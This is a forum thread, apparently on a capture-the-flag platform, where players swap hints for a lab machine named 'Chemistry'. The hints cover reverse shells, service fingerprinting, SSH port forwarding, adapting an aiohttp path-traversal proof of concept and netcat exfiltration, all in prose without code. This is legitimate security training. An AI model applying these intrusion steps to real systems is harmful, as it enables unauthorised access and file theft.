Official Chemistry Discussion

sh4d0wless · December 23, 2024, 7:37am

ı solved, my linux distros firewall has blocked external connection

solis · January 1, 2025, 7:35pm

I never heard of whatweb! it’s installed on Kali by default, sheesh…

Thanks

SydneyJR · January 4, 2025, 12:57am

I have foothold but could anybody explain why only specific reverse shells work ? Is this some sort of security feature built into Linux or python ? How did you guys know what shell to use and what would work ?

Matt.Cross · January 4, 2025, 11:24am

Not sure where I’m going wrong here, or even if I am. I’ve been able to access the low-level user and enumerate ports and services, even have the aiohttp PoC that corresponds to the service version. Whether I curl into the service as Rosa, or whether I use the SSH port forwarding to browse the service that netstat reveals, the PoC doesn’t give anything other than 000 or 404 response codes. Going to bed, brain is scrambled.

Matt.Cross · January 5, 2025, 12:57am

Nvm, I figured it out. The PoC script needs to be modified to suit the directory structure and port of the app on 8080. Nmap and Feroxbuster did the trick for finding that info. It was also useful to me to modify the script so that the successful command is echoed to the prompt where it can be copy-pasted for ease of manipulation.

ABraga · January 6, 2025, 8:04pm

Pwnded. Thanks all for the tips.

wind010 · January 9, 2025, 7:26am

I used LFI/Directory Traversal

govsec · January 9, 2025, 9:09am

my sequence is wrong. i wasted my time on initial foothold going immediately “inside” using an exploit though i initially got that “file” by fuzzing. when you get that “file” crack it. but maybe still going into the server on my initial foothold helped me atleast to see who among them to focus with.

once inside using user:pass, enumerate enumerate enumerate. you’ll see something that’s only accessible from inside. configure your ssh to be able to access that local thingie. you might fall to a rabbit hole at first because of fuzzing but enumeration on the forwarded port will lead you to read something about a version that allows you to read local files (LFI) that’s not accessible by “user:pass” normally. play with the script and remember directory of fuzzing the forwarded port. !!got r00t.

fluffikinz · January 13, 2025, 2:32am

My hint for this box is to remember that pocs often needs a tweak to work properly.

You don’t have to run an exact copy of the environment if you can find out what part makes it vulnerable, copying a function to your own test script works too. You might find an issue you didn’t expect with a payload.

m0sh · January 13, 2025, 6:27pm

This is the real answer for why the “exploits” aren’t working for root. It seems there are multiple versions of exploits out there, such as some python ones, which don’t actually send the path as-is; they normalize the path.

Paddon · January 22, 2025, 11:20pm

Rooted. Very straightforward machine:

foothold: you can find exploits online
user: enumerate
root: double check your ports and files/directories

l3str4nge · February 7, 2025, 9:20pm

Rooted. Nice easy machine.

pointy · February 23, 2025, 11:46pm

Hello, I have a genuine question, how would I know what other payload to use in case the default python reverse shell doesn’t work, although I managed to get the user flag I feel like without reading the forum I wouldn’t have been able to.So what’s the catch, can someone explain a thought process or maybe a different view of it?

wy1d · February 25, 2025, 10:54am

You could just brute force the request with a list of paylaods, but you could’ve also just used normal commands with netcat to send back the responses to enumerate for the ssh creds.

twsec · March 4, 2025, 10:57am

hello thx for the tip the reverse shell worked but when trying uname -r i got a generic linux response

twsec · March 4, 2025, 11:47am

Rooted the machine.
nice one.
thanks for all the tips